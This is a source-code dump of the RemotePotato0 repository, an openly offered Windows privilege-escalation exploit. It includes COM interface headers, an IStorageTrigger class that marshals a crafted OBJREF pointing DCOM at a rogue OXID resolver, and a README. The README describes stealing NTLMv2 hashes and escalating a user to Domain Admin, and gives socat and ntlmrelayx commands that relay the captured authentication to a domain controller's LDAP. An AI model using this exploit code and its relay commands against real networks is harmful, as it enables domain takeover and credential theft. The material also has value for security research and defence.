*pServerInfo, 97 | /* [in] */ DWORD dwCount, 98 | /* [size_is][in] */ MULTI_QI *pResults) = 0; 99 | 100 | virtual HRESULT STDMETHODCALLTYPE StandardGetInstanceFromFile( 101 | /* [in] */ COSERVERINFO *pServerInfo, 102 | /* [in] */ CLSID *pclsidOverride, 103 | /* [in] */ IUnknown *punkOuter, 104 | /* [in] */ DWORD dwClsCtx, 105 | /* [in] */ DWORD grfMode, 106 | /* [in] */ OLECHAR *pwszName, 107 | /* [in] */ DWORD dwCount, 108 | /* [size_is][in] */ MULTI_QI *pResults) = 0; 109 | 110 | virtual HRESULT STDMETHODCALLTYPE StandardGetInstanceFromIStorage( 111 | /* [in] */ COSERVERINFO *pServerInfo, 112 | /* [in] */ CLSID *pclsidOverride, 113 | /* [in] */ IUnknown *punkOuter, 114 | /* [in] */ DWORD dwClsCtx, 115 | /* [in] */ IStorage *pstg, 116 | /* [in] */ DWORD dwCount, 117 | /* [size_is][in] */ MULTI_QI *pResults) = 0; 118 | 119 | virtual HRESULT STDMETHODCALLTYPE Reset( void) = 0; 120 | 121 | }; 122 | 123 | 124 | #else /* C style interface */ 125 | 126 | typedef struct IStandardActivatorVtbl 127 | { 128 | BEGIN_INTERFACE 129 | 130 | HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 131 | IStandardActivator * This, 132 | /* [in] */ REFIID riid, 133 | /* [annotation][iid_is][out] */ 134 | _COM_Outptr_ void **ppvObject); 135 | 136 | ULONG ( STDMETHODCALLTYPE *AddRef )( 137 | IStandardActivator * This); 138 | 139 | ULONG ( STDMETHODCALLTYPE *Release )( 140 | IStandardActivator * This); 141 | 142 | HRESULT ( STDMETHODCALLTYPE *StandardGetClassObject )( 143 | IStandardActivator * This, 144 | /* [in] */ REFCLSID rclsid, 145 | /* [in] */ DWORD dwClsCtx, 146 | /* [in] */ COSERVERINFO *pServerInfo, 147 | /* [in] */ REFIID riid, 148 | /* [iid_is][out] */ void **ppv); 149 | 150 | HRESULT ( STDMETHODCALLTYPE *StandardCreateInstance )( 151 | IStandardActivator * This, 152 | /* [in] */ REFCLSID Clsid, 153 | /* [in] */ IUnknown *punkOuter, 154 | /* [in] */ DWORD dwClsCtx, 155 | /* [in] */ COSERVERINFO *pServerInfo, 156 | /* [in] */ DWORD dwCount, 157 | /* [size_is][in] */ MULTI_QI *pResults); 158 | 159 | HRESULT ( STDMETHODCALLTYPE *StandardGetInstanceFromFile )( 160 | IStandardActivator * This, 161 | /* [in] */ COSERVERINFO *pServerInfo, 162 | /* [in] */ CLSID *pclsidOverride, 163 | /* [in] */ IUnknown *punkOuter, 164 | /* [in] */ DWORD dwClsCtx, 165 | /* [in] */ DWORD grfMode, 166 | /* [in] */ OLECHAR *pwszName, 167 | /* [in] */ DWORD dwCount, 168 | /* [size_is][in] */ MULTI_QI *pResults); 169 | 170 | HRESULT ( STDMETHODCALLTYPE *StandardGetInstanceFromIStorage )( 171 | IStandardActivator * This, 172 | /* [in] */ COSERVERINFO *pServerInfo, 173 | /* [in] */ CLSID *pclsidOverride, 174 | /* [in] */ IUnknown *punkOuter, 175 | /* [in] */ DWORD dwClsCtx, 176 | /* [in] */ IStorage *pstg, 177 | /* [in] */ DWORD dwCount, 178 | /* [size_is][in] */ MULTI_QI *pResults); 179 | 180 | HRESULT ( STDMETHODCALLTYPE *Reset )( 181 | IStandardActivator * This); 182 | 183 | END_INTERFACE 184 | } IStandardActivatorVtbl; 185 | 186 | interface IStandardActivator 187 | { 188 | CONST_VTBL struct IStandardActivatorVtbl *lpVtbl; 189 | }; 190 | 191 | 192 | 193 | #ifdef COBJMACROS 194 | 195 | 196 | #define IStandardActivator_QueryInterface(This,riid,ppvObject) \ 197 | ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 198 | 199 | #define IStandardActivator_AddRef(This) \ 200 | ( (This)->lpVtbl -> AddRef(This) ) 201 | 202 | #define IStandardActivator_Release(This) \ 203 | ( (This)->lpVtbl -> Release(This) ) 204 | 205 | 206 | #define IStandardActivator_StandardGetClassObject(This,rclsid,dwClsCtx,pServerInfo,riid,ppv) \ 207 | ( (This)->lpVtbl -> StandardGetClassObject(This,rclsid,dwClsCtx,pServerInfo,riid,ppv) ) 208 | 209 | #define IStandardActivator_StandardCreateInstance(This,Clsid,punkOuter,dwClsCtx,pServerInfo,dwCount,pResults) \ 210 | ( (This)->lpVtbl -> StandardCreateInstance(This,Clsid,punkOuter,dwClsCtx,pServerInfo,dwCount,pResults) ) 211 | 212 | #define IStandardActivator_StandardGetInstanceFromFile(This,pServerInfo,pclsidOverride,punkOuter,dwClsCtx,grfMode,pwszName,dwCount,pResults) \ 213 | ( (This)->lpVtbl -> StandardGetInstanceFromFile(This,pServerInfo,pclsidOverride,punkOuter,dwClsCtx,grfMode,pwszName,dwCount,pResults) ) 214 | 215 | #define IStandardActivator_StandardGetInstanceFromIStorage(This,pServerInfo,pclsidOverride,punkOuter,dwClsCtx,pstg,dwCount,pResults) \ 216 | ( (This)->lpVtbl -> StandardGetInstanceFromIStorage(This,pServerInfo,pclsidOverride,punkOuter,dwClsCtx,pstg,dwCount,pResults) ) 217 | 218 | #define IStandardActivator_Reset(This) \ 219 | ( (This)->lpVtbl -> Reset(This) ) 220 | 221 | #endif /* COBJMACROS */ 222 | 223 | 224 | #endif /* C style interface */ 225 | 226 | 227 | 228 | 229 | #endif /* __IStandardActivator_INTERFACE_DEFINED__ */ 230 | 231 | 232 | #ifndef __ISpecialSystemProperties_INTERFACE_DEFINED__ 233 | #define __ISpecialSystemProperties_INTERFACE_DEFINED__ 234 | 235 | /* interface ISpecialSystemProperties */ 236 | /* [unique][uuid][local][object] */ 237 | 238 | 239 | EXTERN_C const IID IID_ISpecialSystemProperties; 240 | 241 | #if defined(__cplusplus) && !defined(CINTERFACE) 242 | 243 | MIDL_INTERFACE("000001b9-0000-0000-C000-000000000046") 244 | ISpecialSystemProperties : public IUnknown 245 | { 246 | public: 247 | virtual HRESULT STDMETHODCALLTYPE SetSessionId( 248 | /* [in] */ ULONG dwSessionId, 249 | /* [in] */ BOOL bUseConsole, 250 | /* [in] */ BOOL fRemoteThisSessionId) = 0; 251 | 252 | virtual HRESULT STDMETHODCALLTYPE GetSessionId( 253 | /* [out] */ ULONG *pdwSessionId, 254 | /* [out] */ BOOL *pbUseConsole) = 0; 255 | 256 | virtual HRESULT STDMETHODCALLTYPE GetSessionId2( 257 | /* [out] */ ULONG *pdwSessionId, 258 | /* [out] */ BOOL *pbUseConsole, 259 | /* [out] */ BOOL *pfRemoteThisSessionId) = 0; 260 | 261 | virtual HRESULT STDMETHODCALLTYPE SetClientImpersonating( 262 | /* [in] */ BOOL fClientImpersonating) = 0; 263 | 264 | virtual HRESULT STDMETHODCALLTYPE GetClientImpersonating( 265 | /* [out] */ BOOL *pfClientImpersonating) = 0; 266 | 267 | virtual HRESULT STDMETHODCALLTYPE SetPartitionId( 268 | /* [in] */ REFGUID guidPartiton) = 0; 269 | 270 | virtual HRESULT STDMETHODCALLTYPE GetPartitionId( 271 | /* [out] */ GUID *pguidPartiton) = 0; 272 | 273 | virtual HRESULT STDMETHODCALLTYPE SetProcessRequestType( 274 | /* [in] */ DWORD dwPRT) = 0; 275 | 276 | virtual HRESULT STDMETHODCALLTYPE GetProcessRequestType( 277 | /* [out] */ DWORD *pdwPRT) = 0; 278 | 279 | virtual HRESULT STDMETHODCALLTYPE SetOrigClsctx( 280 | /* [in] */ DWORD dwClsctx) = 0; 281 | 282 | virtual HRESULT STDMETHODCALLTYPE GetOrigClsctx( 283 | /* [out] */ DWORD *dwClsctx) = 0; 284 | 285 | virtual HRESULT STDMETHODCALLTYPE GetDefaultAuthenticationLevel( 286 | /* [out] */ DWORD *pdwAuthnLevel) = 0; 287 | 288 | virtual HRESULT STDMETHODCALLTYPE SetDefaultAuthenticationLevel( 289 | /* [in] */ DWORD dwAuthnLevel) = 0; 290 | 291 | }; 292 | 293 | 294 | #else /* C style interface */ 295 | 296 | typedef struct ISpecialSystemPropertiesVtbl 297 | { 298 | BEGIN_INTERFACE 299 | 300 | HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 301 | ISpecialSystemProperties * This, 302 | /* [in] */ REFIID riid, 303 | /* [annotation][iid_is][out] */ 304 | _COM_Outptr_ void **ppvObject); 305 | 306 | ULONG ( STDMETHODCALLTYPE *AddRef )( 307 | ISpecialSystemProperties * This); 308 | 309 | ULONG ( STDMETHODCALLTYPE *Release )( 310 | ISpecialSystemProperties * This); 311 | 312 | HRESULT ( STDMETHODCALLTYPE *SetSessionId )( 313 | ISpecialSystemProperties * This, 314 | /* [in] */ ULONG dwSessionId, 315 | /* [in] */ BOOL bUseConsole, 316 | /* [in] */ BOOL fRemoteThisSessionId); 317 | 318 | HRESULT ( STDMETHODCALLTYPE *GetSessionId )( 319 | ISpecialSystemProperties * This, 320 | /* [out] */ ULONG *pdwSessionId, 321 | /* [out] */ BOOL *pbUseConsole); 322 | 323 | HRESULT ( STDMETHODCALLTYPE *GetSessionId2 )( 324 | ISpecialSystemProperties * This, 325 | /* [out] */ ULONG *pdwSessionId, 326 | /* [out] */ BOOL *pbUseConsole, 327 | /* [out] */ BOOL *pfRemoteThisSessionId); 328 | 329 | HRESULT ( STDMETHODCALLTYPE *SetClientImpersonating )( 330 | ISpecialSystemProperties * This, 331 | /* [in] */ BOOL fClientImpersonating); 332 | 333 | HRESULT ( STDMETHODCALLTYPE *GetClientImpersonating )( 334 | ISpecialSystemProperties * This, 335 | /* [out] */ BOOL *pfClientImpersonating); 336 | 337 | HRESULT ( STDMETHODCALLTYPE *SetPartitionId )( 338 | ISpecialSystemProperties * This, 339 | /* [in] */ REFGUID guidPartiton); 340 | 341 | HRESULT ( STDMETHODCALLTYPE *GetPartitionId )( 342 | ISpecialSystemProperties * This, 343 | /* [out] */ GUID *pguidPartiton); 344 | 345 | HRESULT ( STDMETHODCALLTYPE *SetProcessRequestType )( 346 | ISpecialSystemProperties * This, 347 | /* [in] */ DWORD dwPRT); 348 | 349 | HRESULT ( STDMETHODCALLTYPE *GetProcessRequestType )( 350 | ISpecialSystemProperties * This, 351 | /* [out] */ DWORD *pdwPRT); 352 | 353 | HRESULT ( STDMETHODCALLTYPE *SetOrigClsctx )( 354 | ISpecialSystemProperties * This, 355 | /* [in] */ DWORD dwClsctx); 356 | 357 | HRESULT ( STDMETHODCALLTYPE *GetOrigClsctx )( 358 | ISpecialSystemProperties * This, 359 | /* [out] */ DWORD *dwClsctx); 360 | 361 | HRESULT ( STDMETHODCALLTYPE *GetDefaultAuthenticationLevel )( 362 | ISpecialSystemProperties * This, 363 | /* [out] */ DWORD *pdwAuthnLevel); 364 | 365 | HRESULT ( STDMETHODCALLTYPE *SetDefaultAuthenticationLevel )( 366 | ISpecialSystemProperties * This, 367 | /* [in] */ DWORD dwAuthnLevel); 368 | 369 | END_INTERFACE 370 | } ISpecialSystemPropertiesVtbl; 371 | 372 | interface ISpecialSystemProperties 373 | { 374 | CONST_VTBL struct ISpecialSystemPropertiesVtbl *lpVtbl; 375 | }; 376 | 377 | 378 | 379 | #ifdef COBJMACROS 380 | 381 | 382 | #define ISpecialSystemProperties_QueryInterface(This,riid,ppvObject) \ 383 | ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 384 | 385 | #define ISpecialSystemProperties_AddRef(This) \ 386 | ( (This)->lpVtbl -> AddRef(This) ) 387 | 388 | #define ISpecialSystemProperties_Release(This) \ 389 | ( (This)->lpVtbl -> Release(This) ) 390 | 391 | 392 | #define ISpecialSystemProperties_SetSessionId(This,dwSessionId,bUseConsole,fRemoteThisSessionId) \ 393 | ( (This)->lpVtbl -> SetSessionId(This,dwSessionId,bUseConsole,fRemoteThisSessionId) ) 394 | 395 | #define ISpecialSystemProperties_GetSessionId(This,pdwSessionId,pbUseConsole) \ 396 | ( (This)->lpVtbl -> GetSessionId(This,pdwSessionId,pbUseConsole) ) 397 | 398 | #define ISpecialSystemProperties_GetSessionId2(This,pdwSessionId,pbUseConsole,pfRemoteThisSessionId) \ 399 | ( (This)->lpVtbl -> GetSessionId2(This,pdwSessionId,pbUseConsole,pfRemoteThisSessionId) ) 400 | 401 | #define ISpecialSystemProperties_SetClientImpersonating(This,fClientImpersonating) \ 402 | ( (This)->lpVtbl -> SetClientImpersonating(This,fClientImpersonating) ) 403 | 404 | #define ISpecialSystemProperties_GetClientImpersonating(This,pfClientImpersonating) \ 405 | ( (This)->lpVtbl -> GetClientImpersonating(This,pfClientImpersonating) ) 406 | 407 | #define ISpecialSystemProperties_SetPartitionId(This,guidPartiton) \ 408 | ( (This)->lpVtbl -> SetPartitionId(This,guidPartiton) ) 409 | 410 | #define ISpecialSystemProperties_GetPartitionId(This,pguidPartiton) \ 411 | ( (This)->lpVtbl -> GetPartitionId(This,pguidPartiton) ) 412 | 413 | #define ISpecialSystemProperties_SetProcessRequestType(This,dwPRT) \ 414 | ( (This)->lpVtbl -> SetProcessRequestType(This,dwPRT) ) 415 | 416 | #define ISpecialSystemProperties_GetProcessRequestType(This,pdwPRT) \ 417 | ( (This)->lpVtbl -> GetProcessRequestType(This,pdwPRT) ) 418 | 419 | #define ISpecialSystemProperties_SetOrigClsctx(This,dwClsctx) \ 420 | ( (This)->lpVtbl -> SetOrigClsctx(This,dwClsctx) ) 421 | 422 | #define ISpecialSystemProperties_GetOrigClsctx(This,dwClsctx) \ 423 | ( (This)->lpVtbl -> GetOrigClsctx(This,dwClsctx) ) 424 | 425 | #define ISpecialSystemProperties_GetDefaultAuthenticationLevel(This,pdwAuthnLevel) \ 426 | ( (This)->lpVtbl -> GetDefaultAuthenticationLevel(This,pdwAuthnLevel) ) 427 | 428 | #define ISpecialSystemProperties_SetDefaultAuthenticationLevel(This,dwAuthnLevel) \ 429 | ( (This)->lpVtbl -> SetDefaultAuthenticationLevel(This,dwAuthnLevel) ) 430 | 431 | #endif /* COBJMACROS */ 432 | 433 | 434 | #endif /* C style interface */ 435 | 436 | 437 | 438 | 439 | #endif /* __ISpecialSystemProperties_INTERFACE_DEFINED__ */ 440 | 441 | 442 | /* Additional Prototypes for ALL interfaces */ 443 | 444 | /* end of Additional Prototypes */ 445 | 446 | #ifdef __cplusplus 447 | } 448 | #endif 449 | 450 | #endif 451 | 452 | 453 | -------------------------------------------------------------------------------- /IStorageTrigger.cpp: -------------------------------------------------------------------------------- 1 | #include "IStorageTrigger.h" 2 | #include 3 | #include 4 | #include 5 | 6 | #pragma warning(disable : 4996) //_CRT_SECURE_NO_WARNINGS 7 | 8 | extern wchar_t* rogueOxidResolverIp; 9 | extern wchar_t* rogueOxidResolverPort; 10 | extern bool juicyPotatoCompatible; 11 | 12 | void GenRandomByte(byte* s, int len) 13 | { 14 | 15 | int k; 16 | srand((unsigned int)time(NULL)); 17 | for (int i = 0; i < len; ++i) { 18 | k = 1 + (rand() % static_cast(255 - 1 + 1)); 19 | s[i] = k; 20 | //printf("k=%d\n", k); 21 | } 22 | 23 | 24 | } 25 | IStorageTrigger::IStorageTrigger(IStorage* istg) { 26 | _stg = istg; 27 | m_cRef = 1; 28 | return; 29 | } 30 | 31 | HRESULT IStorageTrigger::DisconnectObject(DWORD dwReserved) { 32 | return 0; 33 | } 34 | 35 | HRESULT IStorageTrigger::GetMarshalSizeMax(const IID& riid, void* pv, DWORD dwDestContext, void* pvDestContext, DWORD mshlflags, DWORD* pSize) { 36 | *pSize = 1024; 37 | //printf("IStorageTrigger GetMarshalSizeMax\n"); 38 | return 0; 39 | } 40 | 41 | HRESULT IStorageTrigger::GetUnmarshalClass(const IID& riid, void* pv, DWORD dwDestContext, void* pvDestContext, DWORD mshlflags, CLSID* pCid) { 42 | CLSIDFromString(OLESTR("{00000306-0000-0000-c000-000000000046}"), pCid); 43 | //printf("IStorageTrigger GetUnmarshalClass\n"); 44 | return 0; 45 | } 46 | 47 | HRESULT IStorageTrigger::MarshalInterface(IStream* pStm, const IID& riid, void* pv, DWORD dwDestContext, void* pvDestContext, DWORD mshlflags) { 48 | short sec_len = 8; 49 | char remote_ip_mb[256]; 50 | wchar_t templateRemoteBindings[] = L"%s[%s]"; 51 | wchar_t remoteBindings[256]; 52 | 53 | if (juicyPotatoCompatible) 54 | StringCchPrintfW(remoteBindings, 256, templateRemoteBindings, rogueOxidResolverIp, rogueOxidResolverPort); 55 | else 56 | StringCbCopyW(remoteBindings, 256, rogueOxidResolverIp); 57 | //printf("remoteBindings = %S\n", remoteBindings); 58 | wcstombs(remote_ip_mb, remoteBindings, 256); 59 | 60 | char* ipaddr = remote_ip_mb; 61 | unsigned short str_bindlen = (unsigned short)((strlen(ipaddr)) * 2) + 6; 62 | unsigned short total_length = (str_bindlen + sec_len) / 2; 63 | unsigned char sec_offset = str_bindlen / 2; 64 | 65 | byte data_0[] = { //OBJREF STANDARD 66 | 0x4d,0x45,0x4f,0x57, //MEOW 67 | 0x01,0x00,0x00,0x00, //FLAGS 68 | 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46, 69 | 0x00,0x00,0x00,0x00, //OBJREF STD FLAGS 70 | 0x01,0x00,0x00,0x00 //count 71 | //0x31,0x11,0xb2,0x3e,0x7c,0x05,0xcb,0x32,//OXID 72 | //0x31,0xff,0x38,0xe8,0xb2,0x32,0x32,0x36 73 | //0x17,0x34,0x00,0x00,0xb0,0x17,0x00,0x00,0xb2,0x58,0x99,0xe7,0x61,0xb3,0x1d,0xaa //IPID 74 | }; 75 | 76 | /*byte random_ipid[] = { 77 | 0x17,0x34,0x00,0x00,0xb0,0x17,0x00,0x00,0xb2,0x58,0x99,0xe7,0x61,0xb3,0x1d,0xaa //IPID 78 | };*/ 79 | 80 | byte random_ipid[32]; 81 | GenRandomByte(random_ipid, 32); 82 | byte* dataip; 83 | int len = (int)strlen(ipaddr) * 2; 84 | dataip = (byte*)malloc(len); 85 | for (int i = 0; i < len; i++) 86 | { 87 | if (i % 2) 88 | dataip[i] = *ipaddr++; 89 | else 90 | dataip[i] = 0; 91 | } 92 | 93 | byte data_4[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x0a, 0x00, 0xff, 94 | 0xff, 0x00, 0x00, 0x00, 0x00 95 | }; 96 | 97 | byte data_1[4]; 98 | data_1[0] = (byte)total_length; 99 | data_1[1] = 0; 100 | data_1[2] = sec_offset; 101 | data_1[3] = 0; 102 | 103 | 104 | int size = sizeof(data_0) + sizeof(random_ipid) + sizeof(data_1) + len + 1 + sizeof(data_4); 105 | byte* marshalbuf = (byte*)malloc(size); 106 | int r = 0; 107 | memcpy(&marshalbuf[r], data_0, sizeof(data_0)); 108 | r = sizeof(data_0); 109 | memcpy(&marshalbuf[r], &random_ipid[0], sizeof(random_ipid)); 110 | r = r + sizeof(random_ipid); 111 | memcpy(&marshalbuf[r], data_1, sizeof(data_1)); 112 | r = r + sizeof(data_1); 113 | byte tmp1[] = { 0x07 }; 114 | memcpy(&marshalbuf[r], tmp1, 1); 115 | r = r + 1; 116 | memcpy(&marshalbuf[r], dataip, len); 117 | r = r + len; 118 | 119 | memcpy(&marshalbuf[r], data_4, sizeof(data_4)); 120 | 121 | ULONG written = 0; 122 | pStm->Write(&marshalbuf[0], size, &written); 123 | printf("[*] IStoragetrigger written: %d bytes\n", written); 124 | free(marshalbuf); 125 | free(dataip); 126 | return 0; 127 | } 128 | 129 | HRESULT IStorageTrigger::ReleaseMarshalData(IStream* pStm) { 130 | return 0; 131 | } 132 | HRESULT IStorageTrigger::UnmarshalInterface(IStream* pStm, const IID& riid, void** ppv) { 133 | *ppv = 0; 134 | return 0; 135 | } 136 | HRESULT IStorageTrigger::Commit(DWORD grfCommitFlags) { 137 | _stg->Commit(grfCommitFlags); 138 | return 0; 139 | } 140 | HRESULT IStorageTrigger::CopyTo(DWORD ciidExclude, const IID* rgiidExclude, SNB snbExclude, IStorage* pstgDest) { 141 | _stg->CopyTo(ciidExclude, rgiidExclude, snbExclude, pstgDest); 142 | return 0; 143 | } 144 | HRESULT IStorageTrigger::CreateStorage(const OLECHAR* pwcsName, DWORD grfMode, DWORD reserved1, DWORD reserved2, IStorage** ppstg) { 145 | _stg->CreateStorage(pwcsName, grfMode, reserved1, reserved2, ppstg); 146 | return 0; 147 | } 148 | HRESULT IStorageTrigger::CreateStream(const OLECHAR* pwcsName, DWORD grfMode, DWORD reserved1, DWORD reserved2, IStream** ppstm) { 149 | _stg->CreateStream(pwcsName, grfMode, reserved1, reserved2, ppstm); 150 | return 0; 151 | } 152 | HRESULT IStorageTrigger::DestroyElement(const OLECHAR* pwcsName) { 153 | _stg->DestroyElement(pwcsName); 154 | return 0; 155 | } 156 | HRESULT IStorageTrigger::EnumElements(DWORD reserved1, void* reserved2, DWORD reserved3, IEnumSTATSTG** ppenum) { 157 | _stg->EnumElements(reserved1, reserved2, reserved3, ppenum); 158 | return 0; 159 | } 160 | HRESULT IStorageTrigger::MoveElementTo(const OLECHAR* pwcsName, IStorage* pstgDest, const OLECHAR* pwcsNewName, DWORD grfFlags) { 161 | _stg->MoveElementTo(pwcsName, pstgDest, pwcsNewName, grfFlags); 162 | return 0; 163 | } 164 | HRESULT IStorageTrigger::OpenStorage(const OLECHAR* pwcsName, IStorage* pstgPriority, DWORD grfMode, SNB snbExclude, DWORD reserved, IStorage** ppstg) { 165 | _stg->OpenStorage(pwcsName, pstgPriority, grfMode, snbExclude, reserved, ppstg); 166 | return 0; 167 | } 168 | HRESULT IStorageTrigger::OpenStream(const OLECHAR* pwcsName, void* reserved1, DWORD grfMode, DWORD reserved2, IStream** ppstm) { 169 | _stg->OpenStream(pwcsName, reserved1, grfMode, reserved2, ppstm); 170 | return 0; 171 | } 172 | HRESULT IStorageTrigger::RenameElement(const OLECHAR* pwcsOldName, const OLECHAR* pwcsNewName) { 173 | return 0; 174 | } 175 | HRESULT IStorageTrigger::Revert() { 176 | return 0; 177 | } 178 | HRESULT IStorageTrigger::SetClass(const IID& clsid) { 179 | return 0; 180 | } 181 | HRESULT IStorageTrigger::SetElementTimes(const OLECHAR* pwcsName, const FILETIME* pctime, const FILETIME* patime, const FILETIME* pmtime) { 182 | return 0; 183 | } 184 | HRESULT IStorageTrigger::SetStateBits(DWORD grfStateBits, DWORD grfMask) { 185 | return 0; 186 | } 187 | HRESULT IStorageTrigger::Stat(STATSTG* pstatstg, DWORD grfStatFlag) { 188 | _stg->Stat(pstatstg, grfStatFlag); 189 | 190 | //Allocate from heap because apparently this will get freed in OLE32 191 | const wchar_t c_s[] = L"hello.stg"; 192 | 193 | wchar_t* s = (wchar_t*)CoTaskMemAlloc(sizeof(c_s)); 194 | wcscpy_s(s, sizeof(c_s), c_s); 195 | pstatstg[0].pwcsName = s; 196 | return 0; 197 | } 198 | 199 | ///////////////////////IUknown Interface 200 | HRESULT IStorageTrigger::QueryInterface(const IID& riid, void** ppvObj) { 201 | // Always set out parameter to NULL, validating it first. 202 | if (!ppvObj) { 203 | //printf("QueryInterface INVALID\n"); 204 | return E_INVALIDARG; 205 | } 206 | if (riid == IID_IUnknown) 207 | { 208 | *ppvObj = static_cast(this); 209 | //reinterpret_cast(*ppvObj)->AddRef(); 210 | } 211 | else if (riid == IID_IStorage) 212 | { 213 | *ppvObj = static_cast(this); 214 | } 215 | else if (riid == IID_IMarshal) 216 | { 217 | *ppvObj = static_cast(this); 218 | } 219 | else 220 | { 221 | *ppvObj = NULL; 222 | //printf("QueryInterface NOINT\n"); 223 | return E_NOINTERFACE; 224 | } 225 | // Increment the reference count and return the pointer. 226 | 227 | return S_OK; 228 | 229 | } 230 | 231 | 232 | ULONG IStorageTrigger::AddRef() { 233 | m_cRef++; 234 | return m_cRef; 235 | } 236 | 237 | ULONG IStorageTrigger::Release() { 238 | // Decrement the object's internal counter. 239 | ULONG ulRefCount = m_cRef--; 240 | return ulRefCount; 241 | } 242 | -------------------------------------------------------------------------------- /IStorageTrigger.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "Objidl.h" 3 | 4 | class IStorageTrigger : public IMarshal, public IStorage { 5 | private: 6 | IStorage* _stg; 7 | int m_cRef; 8 | public: 9 | IStorageTrigger(IStorage* stg); 10 | HRESULT STDMETHODCALLTYPE DisconnectObject(DWORD dwReserved); 11 | HRESULT STDMETHODCALLTYPE GetMarshalSizeMax(const IID& riid, void* pv, DWORD dwDestContext, void* pvDestContext, DWORD mshlflags, DWORD* pSize); 12 | HRESULT STDMETHODCALLTYPE GetUnmarshalClass(const IID& riid, void* pv, DWORD dwDestContext, void* pvDestContext, DWORD mshlflags, CLSID* pCid); 13 | HRESULT STDMETHODCALLTYPE MarshalInterface(IStream* pStm, const IID& riid, void* pv, DWORD dwDestContext, void* pvDestContext, DWORD mshlflags); 14 | HRESULT STDMETHODCALLTYPE ReleaseMarshalData(IStream* pStm); 15 | HRESULT STDMETHODCALLTYPE UnmarshalInterface(IStream* pStm, const IID& riid, void** ppv); 16 | HRESULT STDMETHODCALLTYPE Commit(DWORD grfCommitFlags); 17 | HRESULT STDMETHODCALLTYPE CopyTo(DWORD ciidExclude, const IID* rgiidExclude, SNB snbExclude, IStorage* pstgDest); 18 | HRESULT STDMETHODCALLTYPE CreateStorage(const OLECHAR* pwcsName, DWORD grfMode, DWORD reserved1, DWORD reserved2, IStorage** ppstg); 19 | HRESULT STDMETHODCALLTYPE CreateStream(const OLECHAR* pwcsName, DWORD grfMode, DWORD reserved1, DWORD reserved2, IStream** ppstm); 20 | HRESULT STDMETHODCALLTYPE DestroyElement(const OLECHAR* pwcsName); 21 | HRESULT STDMETHODCALLTYPE EnumElements(DWORD reserved1, void* reserved2, DWORD reserved3, IEnumSTATSTG** ppenum); 22 | HRESULT STDMETHODCALLTYPE MoveElementTo(const OLECHAR* pwcsName, IStorage* pstgDest, const OLECHAR* pwcsNewName, DWORD grfFlags); 23 | HRESULT STDMETHODCALLTYPE OpenStorage(const OLECHAR* pwcsName, IStorage* pstgPriority, DWORD grfMode, SNB snbExclude, DWORD reserved, IStorage** ppstg); 24 | HRESULT STDMETHODCALLTYPE OpenStream(const OLECHAR* pwcsName, void* reserved1, DWORD grfMode, DWORD reserved2, IStream** ppstm); 25 | HRESULT STDMETHODCALLTYPE RenameElement(const OLECHAR* pwcsOldName, const OLECHAR* pwcsNewName); 26 | HRESULT STDMETHODCALLTYPE Revert(); 27 | HRESULT STDMETHODCALLTYPE SetClass(const IID& clsid); 28 | HRESULT STDMETHODCALLTYPE SetElementTimes(const OLECHAR* pwcsName, const FILETIME* pctime, const FILETIME* patime, const FILETIME* pmtime); 29 | HRESULT STDMETHODCALLTYPE SetStateBits(DWORD grfStateBits, DWORD grfMask); 30 | HRESULT STDMETHODCALLTYPE Stat(STATSTG* pstatstg, DWORD grfStatFlag); 31 | 32 | HRESULT STDMETHODCALLTYPE QueryInterface(const IID& riid, void** ppvObject); 33 | ULONG STDMETHODCALLTYPE AddRef(); 34 | ULONG STDMETHODCALLTYPE Release(); 35 | }; -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2021 antonioCoco 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # RemotePotato0 2 | 3 | **UPDATE 21-10-2022: The main exploit scenario RPC->LDAP of RemotePotato0 has been fixed. More details at -->** https://twitter.com/splinter_code/status/1583555613950255104 4 | 5 | Just another "Won't Fix" Windows Privilege Escalation from User to Domain Admin. 6 | 7 | RemotePotato0 is an exploit that allows you to escalate your privileges from a generic User to Domain Admin. 8 | 9 | Briefly: 10 | 11 | It abuses the DCOM activation service and trigger an NTLM authentication of any user currently logged on in the target machine. 12 | It is required that a privileged user is logged on the same machine (e.g. a Domain Admin user). 13 | Once the NTLM type1 is triggered we setup a cross protocol relay server that receive the privileged type1 message and relay it to a third resource by unpacking the RPC protocol and packing the authentication over HTTP. On the receiving end you can setup a further relay node (eg. ntlmrelayx) or relay directly to a privileged resource. 14 | RemotePotato0 also allows to grab and steal NTLMv2 hashes of every users logged on a machine. 15 | 16 | ## Examples 17 | 18 | Attacker machine (10.0.0.20) 19 | 20 | Victim machine (10.0.0.45) 21 | 22 | Victim Domain Controller (10.0.0.10) 23 | 24 | #### Module 0 - Rpc2Http cross protocol relay server + potato trigger 25 | 26 | ``` 27 | sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.0.0.45:9999 & 28 | sudo ntlmrelayx.py -t ldap://10.0.0.10 --no-wcf-server --escalate-user normal_user 29 | ``` 30 | **Note: if you are on Windows Server <= 2016 you can avoid the network redirector (socat) because the oxid resolution can be performed locally.** 